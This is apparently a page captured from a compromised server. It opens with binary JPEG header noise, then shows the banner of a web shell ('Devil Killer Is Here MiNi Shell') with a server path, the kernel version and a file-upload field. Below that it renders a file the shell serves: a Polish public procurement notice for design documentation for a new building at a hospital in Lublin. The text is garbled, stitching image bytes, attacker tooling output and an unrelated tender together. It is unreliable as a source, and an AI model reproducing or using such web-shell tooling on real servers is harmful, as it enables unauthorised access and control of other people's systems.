JFIF ( %!1!%)+...383-7(-.+  -% &5/------------------------------------------------";!1AQ"aq2#3BRrb*!1"AQa2q#B ?yRd&vGlJwZvK)YrxB#j]ZAT^dpt{[wkWSԋ*QayBbm*&0<|0pfŷM`̬ ^.qR𽬷^EYTFíw<-.j)M-/s yqT'&FKz-([lև<G$wm2*e Z(Y-FVen櫧lҠDwүH4FX1 VsIOqSBۡNzJKzJξcX%vZcFSuMٖ%B ִ##\[%yYꉅ !VĂ1َRI-NsZJLTAPמQ:y״g_g= m֯Ye+Hyje!EcݸࢮSo{׬*h g<@KI$W+W'_> lUs1,o*ʺE.U"N&CTu7_0VyH,q ,)H㲣5<t ;rhnz%ݓz+4 i۸)P6+F>0Tв`&i}Shn?ik܀՟ȧ@mUSLFηh_er i_qt]MYhq 9LaJpPןߘvꀡ\"z[VƬ¤*aZMo=WkpSp \QhMb˒YH=ܒ m`CJt 8oFp]>pP1F>n8(*aڈ.Y݉[iTع JM!x]ԶaJSWҼܩ`yQ`*kE#nNkZKwA_7~ ΁JЍ;-2qRxYk=Uր>Z qThv@.w c{#&@#l;D$kGGvz/7[P+i3nIl`nrbmQi%}rAVPT*SF`{'6RX46PԮp(3W҅U\a*77lq^rT$vs2MU %*ŧ+\uQXVH !4t*Hg"Z챮 JX+RVU+ތ]PiJT XI= iPO=Ia3[ uؙ&2Z@.*SZ (")s8Y/-Fh Oc=@HRlPYp!wr?-dugNLpB1yWHyoP\ѕрiHִ,ِ0aUL.Yy`LSۜ,HZz!JQiVMb{( tژ <)^Qi_`: }8ٱ9_.)a[kSr> ;wWU#M^#ivT܎liH1Qm`cU+!2ɒIX%ֳNړ;ZI$?b$(9f2ZKe㼭qU8I[ U)9!mh1^N0 f_;׆2HFF'4b! yBGH_jтp'?uibQ T#ѬSX5gޒSF64ScjwU`xI]sAM( 5ATH_+s 0^IB++h@_Yjsp0{U@G -:*} TނMH*֔2Q:o@ w5(߰ua+a ~w[3W(дPYrF1E)3XTmIFqT~z*Is*清Wɴa0Qj%{T.ޅ״cz6u6݁h;֦ 8d97ݴ+ޕxзsȁ&LIJT)R0}f }PJdp`_p)əg(ŕtZ 'ϸqU74iZ{=Mhd$L|*UUn &ͶpHYJۋj /@9X?NlܾHYxnuXږAƞ8j ໲݀pQ4;*3iMlZ6w ȵP Shr!ݔDT7/ҡϲigD>jKAX3jv+ ߧز #_=zTm¦>}Tց<|ag{E*ֳ%5zW.Hh~a%j"e4i=vױi8RzM75i֟fEu64\էeo00d H韧rȪz2eulH$tQ>eO$@B /?=#٤ǕPS/·.iP28s4vOuz3zT& >Z2[0+[#Fޑ]!((!>s`rje('|,),y@\pЖE??u˹yWV%8mJ iw:u=-2dTSuGL+m<*צ1as&5su\phƃ qYLֳ>Y(PKi;Uڕp ..!i,54$IUEGLXrUE6m UJC?%4AT]I]F>׹P9+ee"Aid!Wk|tDv/ODc/,o]i"HIHQ_n spv"b}}&I:pȟU-_)Ux$l:fژɕ(I,oxin8*G>ÌKG}Rڀ8Frajٷh !*za]lx%EVRGYZoWѮ昀BXr{[d,t Eq ]lj+ N})0B,e iqT{z+O B2eB89Cڃ9YkZySi@/(W)d^Ufji0cH!hm-wB7C۔֛X$Zo)EF3VZqm)!wUxM49< 3Y .qDfzm |&T"} {*ih&266U9* <_# 7Meiu^h--ZtLSb)DVZH*#5UiVP+aSRIª!p挤c5g#zt@ypH={ {#0d N)qWT kA<Ÿ)/RT8D14y b2^OW,&Bcc[iViVdִCJ'hRh( 1K4#V`pِTw<1{)XPr9Rc 4)Srgto\Yτ~ xd"jO:A!7􋈒+E0%{M'T^`r=E*L7Q]A{]A<5ˋ.}<9_K (QL9FЍsĮC9!rpi T0q!H \@ܩB>F6 4ۺ6΋04ϲ^#>/@tyB]*ĸp6&<џDP9ᗟatM'> b쪗wI!܁V^tN!6=FD܆9*? q6h8  {%WoHoN.l^}"1+uJ ;r& / IɓKH*ǹP-J3+9 25w5IdcWg0n}U@2 #0iv腳z/^ƃOR}IvV2j(tB1){S"B\ ih.IXbƶ:GnI F.^a?>~!k''T[ע93fHlNDH;;sg-@, JOs~Ss^H '"#t=^@'W~Ap'oTڭ{Fن̴1#'c>꜡?F颅B L,2~ת-s2`aHQm:F^j&~*Nūv+{sk$F~ؒ'#kNsٗ D9PqhhkctԷFIo4M=SgIu`F=#}Zi'cu!}+CZI7NuŤIe1XT xC۷hcc7 l?ziY䠩7:E>k0Vxypm?kKNGCΒœap{=i1<6=IOV#WY=SXCޢfxl4[Qe1 hX+^I< tzǟ;jA%n=q@j'JT|na$~BU9؂dzu)m%glwnXL`޹W`AH̸뢙gEu[,'%1pf?tJ Ζmc[\ZyJvn$Hl'<+5[b]v efsЁ ^. &2 yO/8+$ x+zs˧Cޘ'^e fA+ڭsOnĜz,FU%HU&h fGRN擥{N$k}92k`Gn8<ʮsdH01>b{ {+ [k_F@KpkqV~sdy%ϦwK`D!N}N#)x9nw@7y4*\ Η$sR\xts30`O<0m~%U˓5_m ôªs::kB֫.tpv쌷\R)3Vq>ٝj'r-(du @9s5`;iaqoErY${i .Z(Џs^!yCϾ˓JoKbQU{௫e.-r|XWլYkZe0AGluIɦvd7 q -jEfۭt4q +]td_+%A"zM2xlqnVdfU^QaDI?+Vi\ϙLG9r>Y {eHUqp )=sYkt,s1!r,l鄛u#I$-֐2A=A\J]&gXƛ<ns_Q(8˗#)4qY~$'3"'UYcIv s.KO!{, ($LI rDuL_߰ Ci't{2L;\ߵ7@HK.Z)4
Devil Killer Is Here MiNi Shell

MiNi SheLL

Current Path : /home/vmanager/www/common/web/tenders/20210723/

Linux eb5096292c53 5.15.0-102-generic #112-Ubuntu SMP Tue Mar 5 16:50:32 UTC 2024 x86_64
Upload File :
Current File : /home/vmanager/www/common/web/tenders/20210723/0012567504-N-2021.html

<header hidden><table style="border-bottom: 1px solid black; width:100%"><tr><td>Ogłoszenie nr 2021/BZP 00125675 z dnia 2021-07-23</td></tr></table></header><main><!-- Version 1.0.0 --><style type="text/css"> .normal { color: black; } h1.title { }</style> <h1 class="text-center mt-5 mb-5">Ogłoszenie o zamówieniu<br/> Usługi<br/> Opracowanie dokumentacji projektowo-kosztorysowej związanej z budową bloku „R” Wojewódzkiego Szpitala Specjalistycznego im. Stefana Kardynała Wyszyńskiego w Lublinie. </h1> <h2 class="bg-light p-3 mt-4">SEKCJA I - ZAMAWIAJĄCY</h2> <h3 class="mb-0">1.1.) Rola zamawiającego</h3> <p class="mb-0">Postępowanie prowadzone jest samodzielnie przez zamawiającego</p> <h3 class="mb-0">1.2.) Nazwa zamawiającego: <span class="normal">WOJEWÓDZKI SZPITAL SPECJALISTYCZNY im. Stefana Kardynała Wyszyńskiego Samodzielny Publiczny Zakład Opieki Zdrowotnej</span></h3> <h3 class="mb-0">1.4) Krajowy Numer Identyfikacyjny: <span class="normal">REGON 431018940</span></h3><h3 class="mb-0">1.5) Adres zamawiającego </h3> <h3 class="mb-0">1.5.1.) Ulica: <span class="normal">al. Kraśnicka 100</span></h3> <h3 class="mb-0">1.5.2.) Miejscowość: <span class="normal">Lublin</span></h3> <h3 class="mb-0">1.5.3.) Kod pocztowy: <span class="normal">20-718</span></h3> <h3 class="mb-0">1.5.4.) Województwo: <span class="normal">lubelskie</span></h3> <h3 class="mb-0">1.5.5.) Kraj: <span class="normal">Polska</span></h3> <h3 class="mb-0">1.5.6.) Lokalizacja NUTS 3: <span class="normal">PL814 - Lubelski</span></h3> <h3 class="mb-0">1.5.9.) Adres poczty elektronicznej: <span class="normal">zamowienia@szpital.lubin.pl</span></h3> <h3 class="mb-0">1.5.10.) Adres strony internetowej zamawiającego: <span class="normal">https://www.szpital.lublin.pl/</span></h3> <h3 class="mb-0"> 1.6.) Rodzaj zamawiającego: <span class="normal">Zamawiający publiczny - inny zamawiający</span> </h3> <p class="mb-0"> Samodzielny Publiczny Zakład Opieki Zdrowotnej </p> <h3 class="mb-0"> 1.7.) Przedmiot działalności zamawiającego: <span class="normal">Zdrowie</span> </h3> <h2 class="bg-light p-3 mt-4">SEKCJA II – INFORMACJE PODSTAWOWE</h2> <h3 class="mb-0">2.1.) Ogłoszenie dotyczy: </h3> <p class="mb-0"> Zamówienia publicznego </p> <h3 class="mb-0">2.2.) Ogłoszenie dotyczy usług społecznych i innych szczególnych usług: <span class="normal">Nie</span></h3> <h3 class="mb-0">2.3.) Nazwa zamówienia albo umowy ramowej: </h3> <p class="mb-0"> Opracowanie dokumentacji projektowo-kosztorysowej związanej z budową bloku „R” Wojewódzkiego Szpitala Specjalistycznego im. Stefana Kardynała Wyszyńskiego w Lublinie. </p> <h3 class="mb-0">2.4.) Identyfikator postępowania: <span class="normal">ocds-148610-a5da5541-ebb1-11eb-b885-f28f91688073</span></h3> <h3 class="mb-0">2.5.) Numer ogłoszenia: <span class="normal">2021/BZP 00125675</span></h3> <h3 class="mb-0">2.6.) Wersja ogłoszenia: <span class="normal">04</span></h3> <h3 class="mb-0">2.7.) Data ogłoszenia: <span class="normal">2021-07-23</span></h3> <h3 class="mb-0">2.8.) Zamówienie albo umowa ramowa zostały ujęte w planie postępowań: <span class="normal">Tak</span></h3> <h3 class="mb-0">2.9.) Numer planu postępowań w BZP: <span class="normal">2021/BZP 00002523/16/P</span></h3> <h3 class="mb-0">2.10.) Identyfikator pozycji planu postępowań: </h3> <p class="mb-0">1.3.22 Opracowanie dokumentacji projektowejwielobranżowej budowy bloku R w wystemie modułowym</p> <h3 class="mb-0">2.11.) O udzielenie zamówienia mogą ubiegać się wyłącznie wykonawcy, o których mowa w art. 94 ustawy: <span class="normal">Nie</span></h3> <h3 class="mb-0">2.14.) Czy zamówienie albo umowa ramowa dotyczy projektu lub programu współfinansowanego ze środków Unii Europejskiej: <span class="normal">Nie</span></h3> <h3 class="mb-0">2.16.) Tryb udzielenia zamówienia wraz z podstawą prawną</h3> <p class="mb-0"> Zamówienie udzielane jest w trybie podstawowym na podstawie: art. 275 pkt 1 ustawy </p> <h2 class="bg-light p-3 mt-4">SEKCJA III – UDOSTĘPNIANIE DOKUMENTÓW ZAMÓWIENIA I KOMUNIKACJA</h2> <h3 class="mb-0">3.1.) Adres strony internetowej prowadzonego postępowania</h3> https://szpital-lublin.eb2b.com.pl/ <h3 class="mb-0">3.2.) Zamawiający zastrzega dostęp do dokumentów zamówienia: <span class="normal">Nie</span></h3> <h3 class="mb-0">3.4.) Wykonawcy zobowiązani są do składania ofert, wniosków o dopuszczenie do udziału w postępowaniu, oświadczeń oraz innych dokumentów wyłącznie przy użyciu środków komunikacji elektronicznej: <span class="normal">Tak</span></h3> <h3 class="mb-0">3.5.) Informacje o środkach komunikacji elektronicznej, przy użyciu których zamawiający będzie komunikował się z wykonawcami - adres strony internetowej: <span class="normal">https://szpital-lublin.eb2b.com.pl/</span></h3> <h3 class="mb-0">3.6.) Wymagania techniczne i organizacyjne dotyczące korespondencji elektronicznej: <span class="normal">Postępowanie prowadzone jest w języku polskim za pośrednictwem Platformy Zakupowej (dalej<br/>jako„Platforma", „System”) pod adresem: https://szpital-lublin.eb2b.com.pl/, pod numerem<br/>postępowanianadanym przez Zamawiającego.2. Korzystanie z Platformy przez Wykonawcę jest<br/>bezpłatne.3.Komunikacja między Zamawiającym a Wykonawcami odbywa się: w formie elektronicznej<br/>lub wpostaci elektronicznej opatrzonej podpisem zaufanym lub podpisem osobistym, wg zasad<br/>wskazanychw ustawie Pzp oraz aktach wykonawczych do tej ustawy. Za datę wpływu oświadczeń,<br/>wniosków,zawiadomień oraz informacji przyjmuje się datę ich wczytania do Systemu.W przypadku<br/>wprowadzeniaw Platformie innych treści niż określone w instrukcji korzystania z Platformy,<br/>Zamawiający uzna zawiążące te informacje, które zostały złożone w formie i na zasadach określonych<br/>w SWZ.4. Oferty,oświadczenia i dokumenty w przedmiotowym postępowaniu składa się przy użyciu<br/>środkówkomunikacji elektronicznej w formie elektronicznej lub w postaci elektronicznej opatrzonej podpisemzaufanym lub podpisem osobistym.Szczegóły dot. korespondencji Zamawiającego z Wykonawcamizawarte są w SWZ</span></h3> <h3 class="mb-0">3.7.) Adres strony internetowej, pod którym są dostępne narzędzia, urządzenia lub formaty plików, które nie są ogólnie dostępne: <span class="normal">https://szpital-lublin.eb2b.com.pl/</span></h3> <h3 class="mb-0">3.8.) Zamawiający wymaga sporządzenia i przedstawienia ofert przy użyciu narzędzi elektronicznego modelowania danych budowlanych lub innych podobnych narzędzi, które nie są ogólnie dostępne: <span class="normal">Nie</span></h3> <h3 class="mb-0">3.12.) Oferta - katalog elektroniczny: <span class="normal">Nie dotyczy</span></h3> <h3 class="mb-0">3.14.) Języki, w jakich mogą być sporządzane dokumenty składane w postępowaniu: </h3> <p class="mb-0">polski</p> <h3 class="mb-0">3.15.) RODO (obowiązek informacyjny): <span class="normal">Informacje dotyczące ochrony osób fizycznych w związku z<br/>przetwarzaniem danych osobowych i w sprawie swobodnego przepływu takich danych określa rozdział<br/>XXII SWZ</span></h3> <h3 class="mb-0">3.16.) RODO (ograniczenia stosowania): <span class="normal">Informacje dotyczące ochrony osób fizycznych w związku z<br/>przetwarzaniem danych osobowych i w sprawie swobodnego przepływu takich danych określa rozdział<br/>XXII SWZ</span></h3> <h2 class="bg-light p-3 mt-4">SEKCJA IV – PRZEDMIOT ZAMÓWIENIA</h2> <h3 class="mb-0">4.1.1.) Przed wszczęciem postępowania przeprowadzono konsultacje rynkowe: <span class="normal">Nie</span></h3> <h3 class="mb-0">4.1.2.) Numer referencyjny: <span class="normal">WSS SP ZOZ DZP 382.39.2021</span></h3> <h3 class="mb-0">4.1.3.) Rodzaj zamówienia: <span class="normal">Usługi</span></h3> <h3 class="mb-0">4.1.4.) Zamawiający udziela zamówienia w częściach, z których każda stanowi przedmiot odrębnego postępowania: <span class="normal">Nie</span></h3> <h3 class="mb-0">4.1.8.) Możliwe jest składanie ofert częściowych: <span class="normal">Nie</span></h3> <h3 class="mb-0">4.1.13.) Zamawiający uwzględnia aspekty społeczne, środowiskowe lub etykiety w opisie przedmiotu zamówienia: <span class="normal">Nie</span></h3><h3 class="mb-0">4.2. Informacje szczegółowe odnoszące się do przedmiotu zamówienia:</h3> <h3 class="mb-0">4.2.2.) Krótki opis przedmiotu zamówienia</h3> <p class="mb-0"> Przedmiotem zamówienia jest: wykonanie dokumentacji projektowo - kosztorysowej dla <br/>budowy budynku R w którym zlokalizowany będzie blok operacyjny wraz z oddziałem <br/>intensywnej terapii, centralna sterylizacja, centralna apteka oraz pomieszczenia <br/>towarzyszące; projektu architektoniczno-budowanego, projektu zagospodarowania terenu,<br/>uzyskania prawomocnego pozwolenia na budowę; wykonania dokumentacji technicznej i <br/>kosztorysowej; udział w charakterze biegłego w trakcie postępowania na wybór wykonawcy <br/>robót budowlanych jak również ze sprawowanie nadzoru autorskiego, dla potrzeb <br/>funkcjonującego SP ZOZ Szpitala Wojewódzkiego Szpitala Specjalistycznego im. Stefana Kardynała Wyszyńskiego w Lublinie. </p> <h3 class="mb-0">4.2.6.) Główny kod CPV: <span class="normal">71000000-8 - Usługi architektoniczne, budowlane, inżynieryjne i kontrolne</span></h3> <h3 class="mb-0">4.2.7.) Dodatkowy kod CPV: </h3> <p class="mb-0">71220000-6 - Usługi projektowania architektonicznego</p> <p class="mb-0">71248000-8 - Nadzór nad projektem i dokumentacją</p> <p class="mb-0">71310000-4 - Doradcze usługi inżynieryjne i budowlane</p> <p class="mb-0">71318000-0 - Inżynieryjne usługi doradcze i konsultacyjne</p> <p class="mb-0">71320000-7 - Usługi inżynieryjne w zakresie projektowania</p> <h3 class="mb-0">4.2.8.) Zamówienie obejmuje opcje: <span class="normal">Nie</span></h3> <!-- realizacja w dniach --> <h3 class="mb-0">4.2.10.) Okres realizacji zamówienia albo umowy ramowej: <span class="normal">120 dni</span></h3> <h3 class="mb-0">4.2.11.) Zamawiający przewiduje wznowienia: <span class="normal">Nie</span></h3> <h3 class="mb-0">4.2.13.) Zamawiający przewiduje udzielenie dotychczasowemu wykonawcy zamówień na podobne usługi lub roboty budowlane: <span class="normal">Nie</span></h3> <h3 class="mb-0">4.3.) Kryteria oceny ofert</h3> <h3 class="mb-0">4.3.1.) Sposób oceny ofert: <span class="normal">Na podstawie określonych kryteriów oceny ofert</span></h3> <h3 class="mb-0">4.3.2.) Sposób określania wagi kryteriów oceny ofert: <span class="normal"> Procentowo </span></h3> <h3 class="mb-0">4.3.3.) Stosowane kryteria oceny ofert: <span class="normal"> Kryterium ceny oraz kryteria jakościowe </span></h3> <h3 class="mb-0">Kryterium 1</h3> <h3 class="mb-0">4.3.5.) Nazwa kryterium: <span class="normal">Cena</span></h3> <h3 class="mb-0">4.3.6.) Waga: <span class="normal">60</span></h3> <h3 class="mb-0">Kryterium 2</h3> <h3 class="mb-0">4.3.4.) Rodzaj kryterium: </h3> organizacja, kwalifikacje zawodowe i doświadczenie osób wyznaczonych do realizacji zamówienia <h3 class="mb-0">4.3.5.) Nazwa kryterium: <span class="normal">Doświadczenie kierownika projektu, zespołu</span></h3> <h3 class="mb-0">4.3.6.) Waga: <span class="normal">40</span></h3> <h3 class="mb-0">4.3.10.) Zamawiający określa aspekty społeczne, środowiskowe lub innowacyjne, żąda etykiet lub stosuje rachunek kosztów cyklu życia w odniesieniu do kryterium oceny ofert: <span class="normal">Nie</span></h3> <h2 class="bg-light p-3 mt-4">SEKCJA V - KWALIFIKACJA WYKONAWCÓW</h2> <h3 class="mb-0">5.1.) Zamawiający przewiduje fakultatywne podstawy wykluczenia: <span class="normal">Tak</span></h3> <h3 class="mb-0">5.2.) Fakultatywne podstawy wykluczenia: </h3> <p class="mb-0">Art. 109 ust. 1 pkt 4</p> <h3 class="mb-0">5.3.) Warunki udziału w postępowaniu: <span class="normal">Tak</span></h3> <h3 class="mb-0">5.4.) Nazwa i opis warunków udziału w postępowaniu.</h3> O udzielenie zamówienia mogą ubiegać się Wykonawcy, którzy spełniają warunki udziału w <br/>postępowaniu dotyczące: <br/>1.1. zdolności do występowania w obrocie gospodarczym:<br/>Zamawiający nie określa warunku w ww. zakresie.<br/>1.2. uprawnień do prowadzenia określonej działalności gospodarczej lub zawodowej, o ile <br/>wynika to z odrębnych przepisów:<br/>Zamawiający nie określa warunku w ww. zakresie.<br/>1.3. uprawnień sytuacji ekonomicznej lub finansowej:<br/> Zamawiający nie określa warunku w ww. zakresie.<br/>1.4. zdolności technicznej lub zawodowej w zakresie:<br/>a) Wykonawca spełni warunek jeżeli wykaże, że w okresie ostatnich trzech lat przed upływem <br/>terminu składania ofert, a jeżeli okres prowadzenia działalności jest krótszy – w tym okresie wykonał:<br/><br/>1 - 2 usługi których przedmiotem było wykonanie dokumentacji projektowokosztorysowej, których przedmiotem była budowa, nadbudowa, <br/>przebudowa lub remont obiektu ochrony zdrowia w skład którego wchodził <br/>trakt operacyjny (przez obiekt ochrony zdrowia Zamawiający rozumie <br/>budynki zakwalifikowane do klasy 1264 zgodnie z PKOB), o łącznej <br/>wartości prac projektowych minimum 400 000 PLN brutto każda i <br/>całkowitej powierzchni użytkowej nie mniejszej niż 3000 m2 każdy, oraz <br/>załączy dowody potwierdzające, że usługi te zostały wykonane należycie.<br/><br/>UWAGA:<br/>Na podstawie art. 3 pkt 1 ustawy z dnia z dnia 7 lipca 1994 r. Prawo Budowlane (tekst jednolity: Dz. U. z <br/>2020 r, poz. 1333 z późn. zmianami), przez obiekt budowlany, rozumie się: budynek, budowlę bądź <br/>obiekt małej architektury, wraz z instalacjami zapewniającymi możliwość użytkowania obiektu zgodnie z <br/>jego przeznaczeniem, wzniesiony z użyciem wyrobów budowlanych.<br/>Zgodnie z § 3 pkt 6 Rozporządzenia Ministra Infrastruktury z dnia 12 kwietnia 2002 r. w sprawie warunków <br/>technicznych, jakim powinny odpowiadać budynki i ich usytuowanie (t. j.: Dz. U. z 2020 r., poz. 1608), <br/>przez budynek użyteczności publicznej należy rozumieć budynek przeznaczony na potrzeby <br/>administracji publicznej, wymiaru sprawiedliwości, kultury, kultu religijnego, oświaty, szkolnictwa <br/>wyższego, nauki, wychowania, opieki zdrowotnej, społecznej lub socjalnej, obsługi bankowej, handlu, <br/>gastronomii, usług, w tym usług pocztowych lub telekomunikacyjnych, turystyki, sportu, obsługi pasażerów <br/>w transporcie kolejowym, drogowym, lotniczym, morskim lub wodnym śródlądowym, oraz inny budynek <br/>przeznaczony do wykonywania podobnych funkcji; za budynek użyteczności publicznej uznaje się także <br/>budynek biurowy lub socjalny.<br/>b) zdolności technicznej lub zawodowej w zakresie dysponowania osobami zdolnymi do wykonania <br/>zamówienia - Wykonawca spełni warunek jeżeli wykaże, że dysponuje poniżej wskazanymi osobami, <br/>posiadającymi uprawnienia projektanta w specjalności:<br/>Lp. Specjalność: Ilość <br/>osób*:<br/>Wymagania:<br/>1.<br/>Architektonicznej<br/>(KIEROWNIK <br/>PROJEKTU, <br/>ZESPOŁU)<br/>1<br/>1. posiada uprawnienia budowlane do <br/>projektowania w specjalności <br/>architektonicznej bez ograniczeń w <br/>rozumieniu przepisów ustawy z dnia 7 lipca <br/>1994 r. Prawo Budowlane (t.j.: Dz. U. z 2020 <br/>r, poz. 1333, ze zm., dalej: Prawo <br/>budowlane) oraz zgodnie z <br/>Rozporządzeniem Ministra Infrastruktury i <br/>Rozwoju z dnia 29.04.2019 r. w sprawie <br/>samodzielnych funkcji technicznych w <br/>budownictwie (Dz. U. z 2019 r., poz. 831) lub <br/>odpowiadające im ważne uprawnienia <br/>budowlane, które zostały wydane na <br/>podstawie wcześniej obowiązujących <br/>przepisów bądź odpowiadające im <br/>uprawnienia wydane obywatelom państw <br/>członkowskich Unii Europejskiej,Konfederacji <br/>Szwajcarskiej lub państw członkowskich <br/>Europejskiego Porozumienia o Wolnym <br/>Handlu (EFTA), których odpowiednie <br/>kwalifikacje zawodowe zostały uznane na <br/>zasadach określonych w ustawie z dnia 22 <br/>grudnia 2015 r. o zasadach uznawania Nr postępowania WSS SP ZOZ DZP 382.39.2021<br/>SWZ 12/26<br/>kwalifikacji zawodowych nabytych w <br/>państwach członkowskich Unii Europejskiej <br/>(Dz. U. z 2016 r., poz. 65);<br/>2. posiada co najmniej 60-miesięczne doświadczenie <br/>zawodowe po uzyskaniu uprawnień budowlanych, w <br/>projektowaniu w ww. specjalności<br/>2. Konstrukcyjnobudowlanej 1<br/>1. posiada uprawnienia budowlane do projektowania w <br/>specjalności konstrukcyjno-budowlanej bez ograniczeń <br/>w rozumieniu przepisów ustawy z dnia 7 lipca 1994 r. <br/>Prawo Budowlane (t.j.: Dz. U. z 2020 r, poz. 1333, z <br/>póź. zm., dalej: Prawo budowlane) oraz zgodnie z <br/>Rozporządzeniem Ministra Infrastruktury i Rozwoju z <br/>dnia 29.04.2019 r. w sprawie samodzielnych funkcji <br/>technicznych w budownictwie (Dz. U. z 2019 r., poz. <br/>831) lub odpowiadające im ważne uprawnienia <br/>budowlane, które zostały wydane na podstawie <br/>wcześniej obowiązujących przepisów bądź <br/>odpowiadające im uprawnienia wydane obywatelom <br/>państw członkowskich Unii Europejskiej, Konfederacji <br/>Szwajcarskiej lub państw członkowskich Europejskiego <br/>Porozumienia o Wolnym Handlu (EFTA), których <br/>odpowiednie kwalifikacje zawodowe zostały uznane na <br/>zasadach określonych w ustawie z dnia 22 grudnia <br/>2015 r. o zasadach uznawania kwalifikacji <br/>zawodowych nabytych w państwach członkowskich <br/>Unii Europejskiej (Dz. U. z 2016 r., poz. 65);<br/>2. posiada co najmniej 60-miesięczne doświadczenie <br/>zawodowe po uzyskaniu uprawnień budowlanych, w <br/>projektowaniu w ww. specjalności<br/>3<br/>Instalacyjnej w <br/>zakresie sieci, <br/>instalacji i urządzeń <br/>cieplnych, gazowych, <br/>wentylacyjnych, <br/>wodociągowych i <br/>kanalizacyjnych – bez <br/>ograniczeń<br/>1<br/>1. posiada uprawnienia budowlane do projektowania bez <br/>ograniczeń w specjalności instalacyjnej w zakresie sieci, <br/>instalacji i urządzeń cieplnych, gazowych, wentylacyjnych, <br/>wodociągowych i kanalizacyjnych – bez ograniczeń w <br/>rozumieniu przepisów ustawy z dnia 7 lipca 1994 r. Prawo <br/>Budowlane (t.j.:Dz. U. z 2020 r, poz. 1333, ze zm., dalej: Prawo <br/>budowlane) oraz zgodnie z Rozporządzeniem Ministra <br/>Infrastruktury i Rozwoju z dnia 29.04.2019 r. w sprawie <br/>samodzielnych funkcji technicznych w budownictwie (Dz. U. z <br/>2019 r., poz. 831) lub odpowiadające im ważne uprawnienia <br/>budowlane, które zostały wydane na podstawie wcześniej <br/>obowiązujących przepisów bądź odpowiadające im <br/>uprawnienia wydane obywatelom państw członkowskich Unii <br/>Europejskiej, Konfederacji Szwajcarskiej lub państw <br/>członkowskich Europejskiego Porozumienia o Wolnym Handlu <br/>(EFTA), których odpowiednie kwalifikacje zawodowe zostały <br/>uznane na zasadach określonych w ustawie z dnia 22 grudnia <br/>2015 r. o zasadach uznawania kwalifikacji zawodowych <br/>nabytych w państwach członkowskich Unii Europejskiej (Dz. U. <br/>z 2016 r., poz. 65);<br/>2. posiada co najmniej 60-miesięczne doświadczenie <br/>zawodowe po uzyskaniu uprawnień budowlanych, w <br/>projektowaniu w ww. specjalności<br/>4. Instalacyjnej w <br/>zakresie sieci, <br/>1 1. posiada uprawnienia budowlane do projektowania bez <br/>ograniczeń w specjalności instalacyjnej w zakresie Nr postępowania WSS SP ZOZ DZP 382.39.2021<br/>SWZ 13/26<br/>instalacji i urządzeń <br/>elektrycznych i <br/>elektroenergetycznych<br/>sieci, instalacji i urządzeń elektrycznych i <br/>elektroenergetycznych w rozumieniu przepisów ustawy <br/>z dnia 7 lipca 1994 r. Prawo Budowlane (t.j.:Dz. U. z <br/>2020 r, poz. 1333, ze zm., dalej: Prawo budowlane) <br/>oraz zgodnie z Rozporządzeniem Ministra <br/>Infrastruktury i Rozwoju z dnia 29.04.2019 r. w sprawie <br/>samodzielnych funkcji technicznych w budownictwie <br/>(Dz. U. z 2019 r., poz. 831) lub odpowiadające im <br/>ważne uprawnienia budowlane, które zostały wydane <br/>na podstawie wcześniej obowiązujących przepisów <br/>bądź odpowiadające im uprawnienia wydane <br/>obywatelom państw członkowskich Unii Europejskiej, <br/>Konfederacji Szwajcarskiej lub państw członkowskich <br/>Europejskiego Porozumienia o Wolnym Handlu <br/>(EFTA), których odpowiednie kwalifikacje zawodowe <br/>zostały uznane na zasadach określonych w ustawie <br/>z dnia 22 grudnia 2015 r. o zasadach uznawania <br/>kwalifikacji zawodowych nabytych w państwach <br/>członkowskich Unii Europejskiej (Dz. U. z 2016 r., poz. <br/>65);<br/>2. posiada co najmniej 60-miesięczne doświadczenie <br/>zawodowe po uzyskaniu uprawnień budowlanych, w <br/>projektowaniu w ww. specjalności<br/>* wskazana w tabeli powyżej ilość osób jest wymagana niezależnie od ilości zadań, na które <br/>Wykonawca składa ofertę.<br/>UWAGA:<br/>⎯ ilekroć w SWZ mowa jest o uprawnieniach budowlanych do kierowania robotami budowlanymi, <br/>należy przez to rozumieć uprawnienia budowlane do kierowania robotami budowlanymi w <br/>rozumieniu przepisów Prawa budowlanego oraz zgodnie z rozporządzeniem Ministra Inwestycji <br/>i Rozwoju z dnia 29 kwietnia 2019 r. w sprawie przygotowania zawodowego do wykonywania <br/>samodzielnych funkcji technicznych w budownictwie (Dz. U. z 2019 r., poz. 831) lub <br/>odpowiadające im ważne uprawnienia budowlane, które zostały wydane na podstawie <br/>wcześniej obowiązujących przepisów bądź odpowiadające im uprawnienia wydane obywatelom <br/>państw członkowskich Unii Europejskiej, Konfederacji Szwajcarskiej lub państw członkowskich <br/>Europejskiego Porozumienia o Wolnym Handlu (EFTA), których odpowiednie kwalifikacje <br/>zostały uznane na zasadach określonych w ustawie z dnia 22 grudnia 2015 r. o zasadach <br/>uznawania kwalifikacji zawodowych nabytych w państwach członkowskich Unii Europejskiej <br/>(tekst jednolity – Dz. U. z 2020 r., poz. 220);<br/>⎯ jeżeli wymiar wymaganego doświadczenia, które muszą posiadać osoby skierowane do <br/>realizacji przedmiotowego zamówienia, został w powyższej tabeli określony w miesiącach, <br/>należy przez to rozumieć pełne miesiące.<br/>2. Zamawiający może, na każdym etapie postępowania, uznać, że wykonawca nie posiada wymaganych <br/>zdolności, jeżeli zaangażowanie zasobów technicznych lub zawodowych wykonawcy w inne <br/>przedsięwzięcia gospodarcze wykonawcy może mieć negatywny wpływ na realizację zamówienia. <h3 class="mb-0">5.5.) Zamawiający wymaga złożenia oświadczenia, o którym mowa w art.125 ust. 1 ustawy: <span class="normal">Tak</span></h3> <h3 class="mb-0"> 5.6.) Wykaz podmiotowych środków dowodowych na potwierdzenie niepodlegania wykluczeniu: <span class="normal">W celu potwierdzenia braku podstaw do wykluczenia z udziału w postępowaniu Wykonawca <br/>zobowiązany jest złożyć:<br/>a) Odpis lub informacja z Krajowego Rejestru Sądowego lub z Centralnej Ewidencji i Informacji o <br/>Działalności Gospodarczej, w zakresie art. 109 ust. 1 pkt 4 ustawy, sporządzonych nie wcześniej niż 3 miesiące przed jej złożeniem, jeżeli odrębne przepisy wymagają wpisu do rejestru lub ewidencji;</span> </h3> <h3 class="mb-0"> 5.7.) Wykaz podmiotowych środków dowodowych na potwierdzenie spełniania warunków udziału w postępowaniu: <span class="normal">W celu potwierdzenia spełniania warunków udziału w postępowaniu Wykonawca zobowiązany jest <br/>złożyć na wezwanie Zamawiającego następujące dokumenty:<br/>a. wykaz usług wykonanych, a w przypadku świadczeń powtarzających się lub ciągłych również <br/>wykonywanych, w okresie ostatnich 3 lat, a jeżeli okres prowadzenia działalności jest krótszy – w <br/>tym okresie, wraz z podaniem ich wartości, przedmiotu, dat wykonania i podmiotów, na rzecz <br/>których usługi zostały wykonane 